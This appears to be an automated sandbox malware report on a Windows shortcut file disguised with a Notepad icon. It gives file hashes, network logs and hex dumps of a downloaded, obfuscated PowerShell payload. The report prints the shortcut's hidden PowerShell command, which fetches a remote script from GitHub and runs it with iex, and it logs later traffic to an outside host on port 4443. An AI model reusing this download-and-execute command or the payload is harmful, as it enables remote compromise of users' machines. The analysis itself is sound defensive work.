          SSDEEP:48:tR9G/RjuYIbLOZdbNlHJWSogZos355dbNlLWSogZos3d1:tiVuY+LadbNDHb3ndbNxHb37
          MD5:241BD0C72759F470F02F2EB8AB78B258
          SHA1:09956C6E9F807E29E9E8A210AA9F13E8786E5EB8
          SHA-256:EC8CF3EBBBB796CCF2984EBE76127FFCE93BFB603A29BDA67E3B806C25A715E0
          SHA-512:FEB1266CBD7C8B2D6C25F904F4F3E6A94F25B46C47E8B7B498B5FB99587CE24EF1374E2E22E8922EC9CD0A2FD7A40597E83DBF2780BC36721467FA371B61648A
          Malicious:false
          Preview:...................................FL..................F.`.. ......W.......BM...Z..BM...............................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........S...J6N.W.......BM....j.2......Y.L .ZPBIW0~1.LNK..N......EW.5.Y.L..........................5.!.z.p.b.i.w.0.h.t.k.6...l.n.k.......W...............-.......V...................C:\Users\user\Desktop\zpbiw0htk6.lnk....C.:.\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.n.o.t.e.p.a.d...e.x.e.........%SystemRoot%\System32\notepad.exe...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.y.s.t.e.m.3.2.\.n.o.t.e.p.a.d...e.x.e........................................................................................................................................................................................................................

          Static File Info

          General

          File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Mon Oct 7 15:24:37 2024, mtime=Mon Dec 9 16:28:08 2024, atime=Mon Oct 7 15:24:37 2024, length=455680, window=hidenormalshowminimized
          Entropy (8bit):3.560910882589902
          TrID:
          • Windows Shortcut (20020/1) 100.00%
          File name:zpbiw0htk6.lnk
          File size:2'478 bytes
          MD5:ccf38ce4c89ace7e6df58d06027d401d
          SHA1:085835c3c2821d324a84f13c97c4c4390ba51a8f
          SHA256:47f951195d9b1939db1c0269f6fcd3d9446b323bd5302c17e71576ebb040f6df
          SHA512:70913cee13267585dcd2ac6307658349a77f8fc59f04b47e331e038fa5753276ce4ec9559fb87bb2423fd9a95e8acd97f3ae9e12d4bfb3eccd455a9a91275938
          SSDEEP:48:89m+r/YBbgvEYJArOaRs0IdxPIXj/S5z:89m+8CcuArpRbaPIO5
          TLSH:C351BD1227F70314E3F74E796876F220567AB416EE1287DE0190A5889CA0914E83AF2B
          File Content Preview:L..................F.@.. ....MDg......m._J...3Fg.................................P.O. .:i.....+00.../C:\...................V.1......Y.\..Windows.@........OwH.Y......%......................l..W.i.n.d.o.w.s.....Z.1......Y....System32..B........OwH.Y........

          File Icon

          Icon Hash:f9f9fcd8ccc9ed4d

          Static Windows Shortcut Info

          General

          Relative Path:..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command Line Argument:-nop -w h -ep Bypass -c "$url='https'+'://raw.gi'+'thub.com/k53xupn43/i965652f/refs/heads/main/m.ps1';$pl=iwr $url;iex $pl"
          Icon location:C:\Windows\System32\notepad.exe

          Network Behavior

          Network Port Distribution

          TCP Packets

          TimestampSource PortDest PortSource IPDest IP
          Dec 13, 2024 10:38:17.468249083 CET49710443192.168.2.6185.199.110.133
          Dec 13, 2024 10:38:17.468319893 CET44349710185.199.110.133192.168.2.6
          Dec 13, 2024 10:38:17.468398094 CET49710443192.168.2.6185.199.110.133
          Dec 13, 2024 10:38:17.479856968 CET49710443192.168.2.6185.199.110.133
          Dec 13, 2024 10:38:17.479880095 CET44349710185.199.110.133192.168.2.6
          Dec 13, 2024 10:38:18.695128918 CET44349710185.199.110.133192.168.2.6
          Dec 13, 2024 10:38:18.695452929 CET49710443192.168.2.6185.199.110.133
          Dec 13, 2024 10:38:18.698570967 CET49710443192.168.2.6185.199.110.133
          Dec 13, 2024 10:38:18.698585033 CET44349710185.199.110.133192.168.2.6
          Dec 13, 2024 10:38:18.698796988 CET44349710185.199.110.133192.168.2.6
          Dec 13, 2024 10:38:18.711754084 CET49710443192.168.2.6185.199.110.133
          Dec 13, 2024 10:38:18.755366087 CET44349710185.199.110.133192.168.2.6
          Dec 13, 2024 10:38:19.158065081 CET44349710185.199.110.133192.168.2.6
          Dec 13, 2024 10:38:19.158226967 CET44349710185.199.110.133192.168.2.6
          Dec 13, 2024 10:38:19.158430099 CET49710443192.168.2.6185.199.110.133
          Dec 13, 2024 10:38:19.246979952 CET49710443192.168.2.6185.199.110.133
          Dec 13, 2024 10:38:19.414355040 CET49711443192.168.2.6185.199.110.133
          Dec 13, 2024 10:38:19.414400101 CET44349711185.199.110.133192.168.2.6
          Dec 13, 2024 10:38:19.414505005 CET49711443192.168.2.6185.199.110.133
          Dec 13, 2024 10:38:19.419511080 CET49711443192.168.2.6185.199.110.133
          Dec 13, 2024 10:38:19.419524908 CET44349711185.199.110.133192.168.2.6
          Dec 13, 2024 10:38:20.628710985 CET44349711185.199.110.133192.168.2.6
          Dec 13, 2024 10:38:20.628809929 CET49711443192.168.2.6185.199.110.133
          Dec 13, 2024 10:38:20.630358934 CET49711443192.168.2.6185.199.110.133
          Dec 13, 2024 10:38:20.630402088 CET44349711185.199.110.133192.168.2.6
          Dec 13, 2024 10:38:20.630728006 CET44349711185.199.110.133192.168.2.6
          Dec 13, 2024 10:38:20.631814957 CET49711443192.168.2.6185.199.110.133
          Dec 13, 2024 10:38:20.675339937 CET44349711185.199.110.133192.168.2.6
          Dec 13, 2024 10:38:21.140489101 CET44349711185.199.110.133192.168.2.6
          Dec 13, 2024 10:38:21.140552998 CET44349711185.199.110.133192.168.2.6
          Dec 13, 2024 10:38:21.140577078 CET44349711185.199.110.133192.168.2.6
          Dec 13, 2024 10:38:21.140602112 CET44349711185.199.110.133192.168.2.6
          Dec 13, 2024 10:38:21.140659094 CET49711443192.168.2.6185.199.110.133
          Dec 13, 2024 10:38:21.140722036 CET44349711185.199.110.133192.168.2.6
          Dec 13, 2024 10:38:21.140760899 CET49711443192.168.2.6185.199.110.133
          Dec 13, 2024 10:38:21.151736021 CET44349711185.199.110.133192.168.2.6
          Dec 13, 2024 10:38:21.151885986 CET49711443192.168.2.6185.199.110.133
          Dec 13, 2024 10:38:21.151952028 CET44349711185.199.110.133192.168.2.6
          Dec 13, 2024 10:38:21.160206079 CET44349711185.199.110.133192.168.2.6
          Dec 13, 2024 10:38:21.160276890 CET49711443192.168.2.6185.199.110.133
          Dec 13, 2024 10:38:21.160295963 CET44349711185.199.110.133192.168.2.6
          Dec 13, 2024 10:38:21.168581009 CET44349711185.199.110.133192.168.2.6
          Dec 13, 2024 10:38:21.168673038 CET49711443192.168.2.6185.199.110.133
          Dec 13, 2024 10:38:21.168685913 CET44349711185.199.110.133192.168.2.6
          Dec 13, 2024 10:38:21.211869955 CET49711443192.168.2.6185.199.110.133
          Dec 13, 2024 10:38:21.211941004 CET44349711185.199.110.133192.168.2.6
          Dec 13, 2024 10:38:21.258701086 CET49711443192.168.2.6185.199.110.133
          Dec 13, 2024 10:38:21.263197899 CET44349711185.199.110.133192.168.2.6
          Dec 13, 2024 10:38:21.305692911 CET49711443192.168.2.6185.199.110.133
          Dec 13, 2024 10:38:21.332838058 CET44349711185.199.110.133192.168.2.6
          Dec 13, 2024 10:38:21.336870909 CET44349711185.199.110.133192.168.2.6
          Dec 13, 2024 10:38:21.336993933 CET49711443192.168.2.6185.199.110.133
          Dec 13, 2024 10:38:21.337063074 CET44349711185.199.110.133192.168.2.6
          Dec 13, 2024 10:38:21.344517946 CET44349711185.199.110.133192.168.2.6
          Dec 13, 2024 10:38:21.344573021 CET49711443192.168.2.6185.199.110.133
          Dec 13, 2024 10:38:21.344603062 CET44349711185.199.110.133192.168.2.6
          Dec 13, 2024 10:38:21.352669954 CET44349711185.199.110.133192.168.2.6
          Dec 13, 2024 10:38:21.352718115 CET49711443192.168.2.6185.199.110.133
          Dec 13, 2024 10:38:21.364124060 CET49711443192.168.2.6185.199.110.133
          Dec 13, 2024 10:38:21.423979044 CET497134443192.168.2.6157.245.101.141
          Dec 13, 2024 10:38:21.543765068 CET444349713157.245.101.141192.168.2.6
          Dec 13, 2024 10:38:21.543999910 CET497134443192.168.2.6157.245.101.141
          Dec 13, 2024 10:38:24.475941896 CET444349713157.245.101.141192.168.2.6
          Dec 13, 2024 10:38:24.524306059 CET497134443192.168.2.6157.245.101.141
          Dec 13, 2024 10:38:24.611330032 CET497134443192.168.2.6157.245.101.141
          Dec 13, 2024 10:38:24.731276035 CET444349713157.245.101.141192.168.2.6
          Dec 13, 2024 10:38:24.731350899 CET497134443192.168.2.6157.245.101.141
          Dec 13, 2024 10:38:24.851303101 CET444349713157.245.101.141192.168.2.6
          Dec 13, 2024 10:38:25.765892029 CET444349713157.245.101.141192.168.2.6
          Dec 13, 2024 10:38:25.821240902 CET497134443192.168.2.6157.245.101.141
          Dec 13, 2024 10:38:30.765625954 CET444349713157.245.101.141192.168.2.6
          Dec 13, 2024 10:38:30.805550098 CET497134443192.168.2.6157.245.101.141
          Dec 13, 2024 10:38:36.235017061 CET497134443192.168.2.6157.245.101.141
          Dec 13, 2024 10:38:36.354801893 CET444349713157.245.101.141192.168.2.6
          Dec 13, 2024 10:38:36.355458021 CET497134443192.168.2.6157.245.101.141
          Dec 13, 2024 10:38:36.478243113 CET444349713157.245.101.141192.168.2.6

          UDP Packets

          TimestampSource PortDest PortSource IPDest IP
          Dec 13, 2024 10:38:17.305270910 CET6464053192.168.2.61.1.1.1
          Dec 13, 2024 10:38:17.443506956 CET53646401.1.1.1192.168.2.6
          Dec 13, 2024 10:38:19.249447107 CET5850753192.168.2.61.1.1.1
          Dec 13, 2024 10:38:19.386497974 CET53585071.1.1.1192.168.2.6

          DNS Queries

          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Dec 13, 2024 10:38:17.305270910 CET192.168.2.61.1.1.10xf2deStandard query (0)raw.github.comA (IP address)IN (0x0001)false
          Dec 13, 2024 10:38:19.249447107 CET192.168.2.61.1.1.10x5688Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false

          DNS Answers

          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Dec 13, 2024 10:38:17.443506956 CET1.1.1.1192.168.2.60xf2deNo error (0)raw.github.com185.199.110.133A (IP address)IN (0x0001)false
          Dec 13, 2024 10:38:17.443506956 CET1.1.1.1192.168.2.60xf2deNo error (0)raw.github.com185.199.111.133A (IP address)IN (0x0001)false
          Dec 13, 2024 10:38:17.443506956 CET1.1.1.1192.168.2.60xf2deNo error (0)raw.github.com185.199.109.133A (IP address)IN (0x0001)false
          Dec 13, 2024 10:38:17.443506956 CET1.1.1.1192.168.2.60xf2deNo error (0)raw.github.com185.199.108.133A (IP address)IN (0x0001)false
          Dec 13, 2024 10:38:19.386497974 CET1.1.1.1192.168.2.60x5688No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
          Dec 13, 2024 10:38:19.386497974 CET1.1.1.1192.168.2.60x5688No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
          Dec 13, 2024 10:38:19.386497974 CET1.1.1.1192.168.2.60x5688No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
          Dec 13, 2024 10:38:19.386497974 CET1.1.1.1192.168.2.60x5688No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false

          HTTP Request Dependency Graph

          • raw.github.com
          • raw.githubusercontent.com

          HTTPS Proxied Packets

          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.649710185.199.110.1334432360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          TimestampBytes transferredDirectionData
          2024-12-13 09:38:18 UTC199OUTGET /k53xupn43/i965652f/refs/heads/main/m.ps1 HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
          Host: raw.github.com
          Connection: Keep-Alive
          2024-12-13 09:38:19 UTC439INHTTP/1.1 301 Moved Permanently
          Connection: close
          Content-Length: 0
          Location: https://raw.githubusercontent.com/k53xupn43/i965652f/refs/heads/main/m.ps1
          Accept-Ranges: bytes
          Age: 0
          Date: Fri, 13 Dec 2024 09:38:19 GMT
          Via: 1.1 varnish
          X-Served-By: cache-nyc-kteb1890075-NYC
          X-Cache: MISS
          X-Cache-Hits: 0
          X-Timer: S1734082699.969321,VS0,VE34
          Vary: Accept-Encoding
          X-Fastly-Request-ID: cdc2085f94b1cf92a333f2791bac3e803f8ae172


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          1192.168.2.649711185.199.110.1334432360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          TimestampBytes transferredDirectionData
          2024-12-13 09:38:20 UTC210OUTGET /k53xupn43/i965652f/refs/heads/main/m.ps1 HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
          Host: raw.githubusercontent.com
          Connection: Keep-Alive
          2024-12-13 09:38:21 UTC900INHTTP/1.1 200 OK
          Connection: close
          Content-Length: 23985
          Cache-Control: max-age=300
          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
          Content-Type: text/plain; charset=utf-8
          ETag: "c198df59bfed7d71dfe85e0a2ae1890dba8085a37c7cbf3b8529d799a89b1698"
          Strict-Transport-Security: max-age=31536000
          X-Content-Type-Options: nosniff
          X-Frame-Options: deny
          X-XSS-Protection: 1; mode=block
          X-GitHub-Request-Id: E247:947B9:4F6610:57B390:675C008B
          Accept-Ranges: bytes
          Date: Fri, 13 Dec 2024 09:38:20 GMT
          Via: 1.1 varnish
          X-Served-By: cache-ewr-kewr1740021-EWR
          X-Cache: MISS
          X-Cache-Hits: 0
          X-Timer: S1734082701.907037,VS0,VE77
          Vary: Authorization,Accept-Encoding,Origin
          Access-Control-Allow-Origin: *
          Cross-Origin-Resource-Policy: cross-origin
          X-Fastly-Request-ID: a25f17d3f725a606074c99df8f6a34308f574d97
          Expires: Fri, 13 Dec 2024 09:43:20 GMT
          Source-Age: 0
          2024-12-13 09:38:21 UTC1378INData Raw: 24 33 6f 5a 67 78 4f 36 78 47 71 47 5a 4a 56 6c 37 55 51 6a 44 6e 58 71 36 33 51 74 31 57 66 63 78 7a 7a 57 55 57 62 6e 53 55 58 62 41 41 6e 46 4d 76 35 34 6e 53 57 69 42 58 54 76 69 54 6b 61 32 65 4a 63 34 44 70 36 68 6c 53 44 79 51 59 62 6b 54 56 62 46 57 43 42 47 79 4a 66 65 6d 52 75 74 37 65 74 53 41 37 38 4c 55 49 6e 70 70 7a 54 39 78 53 44 6e 30 41 33 52 4c 30 4a 66 31 35 57 6d 44 54 4f 50 4b 79 72 34 35 55 67 73 30 34 55 56 71 56 41 77 6a 48 6b 62 6d 71 4b 55 64 79 6c 4b 7a 30 36 35 4e 58 34 71 58 6e 59 35 51 77 4f 71 6c 6e 53 30 53 30 52 71 46 6c 75 30 78 36 4d 36 31 33 71 69 49 62 31 58 49 65 34 6a 53 70 49 56 37 6a 4d 6c 56 68 68 59 32 69 57 30 78 6d 5a 65 4d 6c 50 67 50 31 35 4f 69 78 51 4d 43 73 44 4b 45 4d 62 75 61 62 62 57 73 79 49 58 50 5a
          Data Ascii: $3oZgxO6xGqGZJVl7UQjDnXq63Qt1WfcxzzWUWbnSUXbAAnFMv54nSWiBXTviTka2eJc4Dp6hlSDyQYbkTVbFWCBGyJfemRut7etSA78LUInppzT9xSDn0A3RL0Jf15WmDTOPKyr45Ugs04UVqVAwjHkbmqKUdylKz065NX4qXnY5QwOqlnS0S0RqFlu0x6M613qiIb1XIe4jSpIV7jMlVhhY2iW0xmZeMlPgP15OixQMCsDKEMbuabbWsyIXPZ
          2024-12-13 09:38:21 UTC1378INData Raw: 46 46 62 57 52 58 77 65 56 62 33 61 45 4f 55 50 33 34 77 6f 61 4d 7a 51 43 4a 32 65 4f 4d 6f 64 54 67 50 35 68 47 72 71 32 7a 71 32 79 42 4b 59 44 72 4a 6f 75 39 6c 4a 57 79 76 77 71 4c 34 71 65 6f 33 64 53 72 65 36 4e 56 59 50 42 45 52 4e 76 78 61 52 68 36 31 63 31 73 51 31 63 75 76 64 73 66 64 56 64 31 68 32 34 6d 79 38 53 4b 58 70 44 75 68 51 47 42 72 6c 4a 50 6a 48 6f 70 54 4c 37 5a 6a 47 55 51 66 69 43 47 50 41 6d 73 33 41 77 50 59 74 79 35 58 6d 32 4c 6a 57 58 43 4c 47 35 6a 78 6e 4c 33 71 6a 36 41 6f 71 65 74 47 43 69 4b 52 34 38 75 6b 50 4a 41 67 59 64 6a 59 55 41 4f 49 68 6a 4f 55 72 33 56 54 38 38 5a 68 51 64 6a 6d 20 2b 20 24 43 55 4d 53 44 55 4f 54 42 58 4f 4d 71 4b 4c 42 5a 75 4d 31 59 30 61 36 75 69 44 6c 4d 36 52 4a 6a 44 4e 57 47 61 49 48
          Data Ascii: FFbWRXweVb3aEOUP34woaMzQCJ2eOModTgP5hGrq2zq2yBKYDrJou9lJWyvwqL4qeo3dSre6NVYPBERNvxaRh61c1sQ1cuvdsfdVd1h24my8SKXpDuhQGBrlJPjHopTL7ZjGUQfiCGPAms3AwPYty5Xm2LjWXCLG5jxnL3qj6AoqetGCiKR48ukPJAgYdjYUAOIhjOUr3VT88ZhQdjm + $CUMSDUOTBXOMqKLBZuM1Y0a6uiDlM6RJjDNWGaIH
          2024-12-13 09:38:21 UTC1378INData Raw: 74 4e 4c 35 4c 37 4a 32 32 37 43 73 38 4f 33 6c 34 70 32 65 6e 39 4e 6e 5a 59 6f 6a 55 70 4a 4e 6e 73 73 31 67 59 61 38 32 59 73 32 66 61 48 64 30 36 43 57 49 70 47 50 31 64 69 66 63 77 33 31 68 43 78 61 4f 67 44 6f 44 54 55 79 49 43 4e 71 6d 44 4f 4a 32 6c 6e 73 68 42 33 62 6f 33 48 73 76 4a 59 4e 72 53 79 36 6b 66 65 43 45 4d 56 55 48 50 30 49 53 35 6b 67 74 39 36 4d 34 63 45 68 4b 48 73 71 44 38 34 4e 59 47 38 50 37 58 67 6c 67 5a 6d 30 33 53 4b 6d 55 50 77 63 30 38 71 37 6f 6d 56 72 71 34 77 74 6d 2c 20 24 37 52 48 64 48 6b 39 51 6e 41 41 41 54 33 68 77 41 50 36 46 49 36 57 77 6b 72 6d 72 38 4a 4f 30 72 7a 38 76 35 62 73 43 50 50 6a 58 6e 79 50 70 32 30 78 58 48 4b 34 69 33 39 46 48 48 33 78 70 64 43 4b 34 33 6f 34 6c 71 33 34 7a 78 45 6a 74 31 44 47
          Data Ascii: tNL5L7J227Cs8O3l4p2en9NnZYojUpJNnss1gYa82Ys2faHd06CWIpGP1difcw31hCxaOgDoDTUyICNqmDOJ2lnshB3bo3HsvJYNrSy6kfeCEMVUHP0IS5kgt96M4cEhKHsqD84NYG8P7XglgZm03SKmUPwc08q7omVrq4wtm, $7RHdHk9QnAAAT3hwAP6FI6Wwkrmr8JO0rz8v5bsCPPjXnyPp20xXHK4i39FHH3xpdCK43o4lq34zxEjt1DG
          2024-12-13 09:38:21 UTC1378INData Raw: 39 53 4c 79 59 47 79 69 6a 71 33 72 7a 68 33 77 37 42 59 6e 33 33 56 75 5a 34 56 45 38 4d 54 44 43 52 73 65 35 33 65 48 34 43 70 4a 46 45 74 67 55 38 69 35 62 42 39 69 73 6b 55 34 50 37 4b 59 4d 65 70 47 66 39 59 66 51 77 6f 44 30 6d 4f 50 31 45 77 72 4f 4d 4c 4c 6b 61 48 50 50 35 31 42 64 33 37 6a 46 77 78 4c 4a 52 67 32 42 73 6a 64 78 79 4b 74 63 52 7a 38 39 6c 61 7a 43 61 6b 4f 75 56 6c 56 42 51 71 32 38 75 75 34 64 6c 70 52 55 6a 33 56 62 7a 32 4f 70 48 34 76 6f 72 2e 47 65 74 53 74 72 65 61 6d 28 29 0a 0a 20 20 20 20 20 20 24 4b 68 49 70 67 6e 57 41 42 6c 50 77 34 36 55 71 75 34 68 38 66 62 74 77 46 66 33 63 33 6a 74 67 38 46 6f 7a 70 33 48 72 57 6c 55 50 7a 74 7a 6f 7a 75 36 67 78 38 57 54 44 46 4a 76 57 42 61 43 74 57 78 54 6a 68 45 36 68 76 20 3d
          Data Ascii: 9SLyYGyijq3rzh3w7BYn33VuZ4VE8MTDCRse53eH4CpJFEtgU8i5bB9iskU4P7KYMepGf9YfQwoD0mOP1EwrOMLLkaHPP51Bd37jFwxLJRg2BsjdxyKtcRz89lazCakOuVlVBQq28uu4dlpRUj3Vbz2OpH4vor.GetStream() $KhIpgnWABlPw46Uqu4h8fbtwFf3c3jtg8Fozp3HrWlUPztzozu6gx8WTDFJvWBaCtWxTjhE6hv =
          2024-12-13 09:38:21 UTC1378INData Raw: 45 6d 58 55 6d 6b 64 6a 67 4f 75 71 39 51 4e 6d 45 33 7a 73 59 74 52 51 39 7a 38 37 45 42 6f 41 51 4f 74 6d 34 48 75 6f 66 52 66 71 6f 33 44 68 64 49 48 76 42 49 61 49 77 7a 6d 55 54 74 39 37 42 30 79 6a 78 79 72 47 66 48 55 42 6f 48 4c 67 54 34 48 47 4f 47 6c 44 41 36 4b 34 56 6d 72 53 37 58 76 63 52 76 78 32 4f 4d 61 43 78 36 34 59 4a 4f 32 42 30 54 36 6d 6c 5a 63 39 4c 35 57 33 30 4e 6a 48 61 49 39 64 78 51 4d 64 64 54 32 37 61 32 7a 68 57 62 50 41 45 47 5a 68 71 69 61 4a 33 38 58 31 54 53 71 44 6e 43 5a 77 59 62 43 4f 43 4c 6b 46 6f 75 53 7a 4c 39 51 36 6e 78 7a 4f 6c 31 55 67 4b 52 57 34 50 78 6c 42 64 73 49 59 4b 6f 30 79 37 75 4b 69 50 39 4c 78 69 66 31 57 6e 71 6d 4c 65 6f 6d 39 4e 32 41 50 37 6f 47 72 30 70 59 79 4a 62 73 59 70 59 59 6d 49 36 6d
          Data Ascii: EmXUmkdjgOuq9QNmE3zsYtRQ9z87EBoAQOtm4HuofRfqo3DhdIHvBIaIwzmUTt97B0yjxyrGfHUBoHLgT4HGOGlDA6K4VmrS7XvcRvx2OMaCx64YJO2B0T6mlZc9L5W30NjHaI9dxQMddT27a2zhWbPAEGZhqiaJ38X1TSqDnCZwYbCOCLkFouSzL9Q6nxzOl1UgKRW4PxlBdsIYKo0y7uKiP9Lxif1WnqmLeom9N2AP7oGr0pYyJbsYpYYmI6m
          2024-12-13 09:38:21 UTC1378INData Raw: 54 44 56 67 57 61 7a 61 59 69 73 77 4c 41 4f 6a 6d 61 30 52 75 51 4b 35 67 36 51 74 65 4d 4a 31 49 4e 37 51 35 6a 48 62 67 51 73 42 38 55 37 37 34 44 70 72 6b 4c 63 4a 45 71 39 53 4d 39 77 58 48 45 61 42 79 4c 36 42 6c 45 59 29 0a 0a 20 20 20 20 20 20 20 24 4b 68 49 70 67 6e 57 41 42 6c 50 77 34 36 55 71 75 34 68 38 66 62 74 77 46 66 33 63 33 6a 74 67 38 46 6f 7a 70 33 48 72 57 6c 55 50 7a 74 7a 6f 7a 75 36 67 78 38 57 54 44 46 4a 76 57 42 61 43 74 57 78 54 6a 68 45 36 68 76 2e 41 75 74 6f 46 6c 75 73 68 20 3d 20 24 74 72 75 65 0a 0a 20 24 51 68 47 55 67 70 47 39 6a 4f 66 68 74 45 6c 6b 31 46 4b 71 4f 4d 38 63 43 48 5a 4b 63 66 66 44 44 74 4e 4b 62 6e 56 4f 6c 72 51 78 72 62 34 46 38 48 42 76 77 47 4b 47 32 39 50 7a 7a 4f 4a 4e 43 39 50 78 44 41 36 39 53
          Data Ascii: TDVgWazaYiswLAOjma0RuQK5g6QteMJ1IN7Q5jHbgQsB8U774DprkLcJEq9SM9wXHEaByL6BlEY) $KhIpgnWABlPw46Uqu4h8fbtwFf3c3jtg8Fozp3HrWlUPztzozu6gx8WTDFJvWBaCtWxTjhE6hv.AutoFlush = $true $QhGUgpG9jOfhtElk1FKqOM8cCHZKcffDDtNKbnVOlrQxrb4F8HBvwGKG29PzzOJNC9PxDA69S
          2024-12-13 09:38:21 UTC1378INData Raw: 53 44 69 34 46 4d 54 45 52 62 64 32 55 72 30 6b 76 49 74 69 38 52 71 57 6f 48 31 67 45 38 38 7a 75 47 37 64 68 47 63 6d 69 63 38 32 31 73 37 4f 6d 35 35 6b 63 65 6b 6c 6b 4e 61 6c 69 57 79 54 53 7a 57 52 46 46 52 46 68 65 78 6b 6c 38 31 39 68 44 6a 6c 36 65 66 39 44 4b 32 47 76 38 50 36 74 57 66 77 62 4e 63 6e 49 63 63 78 56 67 73 77 63 31 62 77 39 30 36 47 41 45 4f 41 70 59 74 63 59 75 51 4a 72 56 6e 4e 4d 68 34 7a 49 48 38 62 59 49 66 6e 5a 63 4b 39 66 70 32 69 47 58 75 32 6c 6b 44 57 59 69 71 69 73 4f 55 79 57 7a 77 79 42 69 30 4b 74 65 45 47 33 5a 6c 42 54 74 52 66 59 59 61 6a 34 52 70 67 32 73 44 66 4b 49 4a 6a 69 39 33 69 63 71 71 67 76 30 71 65 5a 72 56 68 61 36 72 31 30 6c 73 6c 70 53 57 48 74 37 4e 4f 53 4d 46 4c 4b 66 39 39 73 39 49 44 42 32 75
          Data Ascii: SDi4FMTERbd2Ur0kvIti8RqWoH1gE88zuG7dhGcmic821s7Om55kceklkNaliWyTSzWRFFRFhexkl819hDjl6ef9DK2Gv8P6tWfwbNcnIccxVgswc1bw906GAEOApYtcYuQJrVnNMh4zIH8bYIfnZcK9fp2iGXu2lkDWYiqisOUyWzwyBi0KteEG3ZlBTtRfYYaj4Rpg2sDfKIJji93icqqgv0qeZrVha6r10lslpSWHt7NOSMFLKf99s9IDB2u
          2024-12-13 09:38:21 UTC1378INData Raw: 52 33 4b 44 39 6f 4e 70 35 57 77 34 69 73 61 71 79 56 6c 42 72 62 49 76 30 6c 78 45 61 4c 53 78 76 56 49 72 4a 71 66 68 46 78 6f 53 55 34 52 54 53 37 50 72 37 30 35 34 6f 44 54 47 6e 32 4b 48 6e 36 52 30 68 77 68 45 50 72 77 57 33 4d 75 77 46 52 34 59 73 4f 49 6f 4c 67 79 35 48 42 5a 4a 30 69 74 31 34 50 70 77 4d 34 43 39 4b 5a 50 33 38 4d 6f 72 35 54 4f 37 53 43 72 58 42 72 78 78 67 38 44 52 6a 66 4f 6f 75 30 71 71 74 68 53 31 44 44 68 71 4d 59 6c 33 57 38 76 48 4f 30 42 55 77 67 4c 36 55 53 36 62 53 51 59 58 62 45 37 62 79 4f 67 63 6f 71 48 44 37 68 77 37 70 58 65 70 50 54 71 65 75 69 6a 41 6e 6e 38 30 50 37 6f 49 4e 55 53 48 54 71 49 48 42 7a 73 43 53 44 69 34 46 4d 54 45 52 62 64 32 55 72 30 6b 76 49 74 69 38 52 71 57 6f 48 31 67 45 38 38 7a 75 47 37
          Data Ascii: R3KD9oNp5Ww4isaqyVlBrbIv0lxEaLSxvVIrJqfhFxoSU4RTS7Pr7054oDTGn2KHn6R0hwhEPrwW3MuwFR4YsOIoLgy5HBZJ0it14PpwM4C9KZP38Mor5TO7SCrXBrxxg8DRjfOou0qqthS1DDhqMYl3W8vHO0BUwgL6US6bSQYXbE7byOgcoqHD7hw7pXepPTqeuijAnn80P7oINUSHTqIHBzsCSDi4FMTERbd2Ur0kvIti8RqWoH1gE88zuG7
          2024-12-13 09:38:21 UTC1378INData Raw: 4f 67 63 6f 71 48 44 37 68 77 37 70 58 65 70 50 54 71 65 75 69 6a 41 6e 6e 38 30 50 37 6f 49 4e 55 53 48 54 71 49 48 42 7a 73 43 53 44 69 34 46 4d 54 45 52 62 64 32 55 72 30 6b 76 49 74 69 38 52 71 57 6f 48 31 67 45 38 38 7a 75 47 37 64 68 47 63 6d 69 63 38 32 31 73 37 4f 6d 35 35 6b 63 65 6b 6c 6b 4e 61 6c 69 57 79 54 53 7a 57 52 46 46 52 46 68 65 78 6b 6c 38 31 39 68 44 6a 6c 36 65 66 39 44 4b 32 47 76 38 50 36 74 57 66 77 62 4e 63 6e 49 63 63 78 56 67 73 77 63 31 62 77 39 30 36 47 41 45 4f 41 70 59 74 63 59 75 51 4a 72 56 6e 4e 4d 68 34 7a 49 48 38 62 59 49 66 6e 5a 63 4b 39 66 70 32 69 47 58 75 32 6c 6b 44 57 59 69 71 69 73 4f 55 79 57 7a 77 79 42 69 30 4b 74 65 45 47 33 5a 6c 42 54 74 52 66 59 59 61 6a 34 52 70 67 32 73 44 66 4b 49 4a 6a 69 39 33 69
          Data Ascii: OgcoqHD7hw7pXepPTqeuijAnn80P7oINUSHTqIHBzsCSDi4FMTERbd2Ur0kvIti8RqWoH1gE88zuG7dhGcmic821s7Om55kceklkNaliWyTSzWRFFRFhexkl819hDjl6ef9DK2Gv8P6tWfwbNcnIccxVgswc1bw906GAEOApYtcYuQJrVnNMh4zIH8bYIfnZcK9fp2iGXu2lkDWYiqisOUyWzwyBi0KteEG3ZlBTtRfYYaj4Rpg2sDfKIJji93i
